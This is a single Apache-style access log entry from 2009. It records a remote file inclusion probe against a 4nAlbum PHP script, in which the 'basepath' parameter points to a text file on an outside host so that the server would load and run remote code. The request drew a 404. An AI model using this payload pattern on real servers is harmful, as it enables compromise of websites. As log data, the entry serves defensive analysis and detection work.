210.112.121.225 - - [15/Jun/2009:02:52:11 -0400] "GET /logs/error_log.Q109052500//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
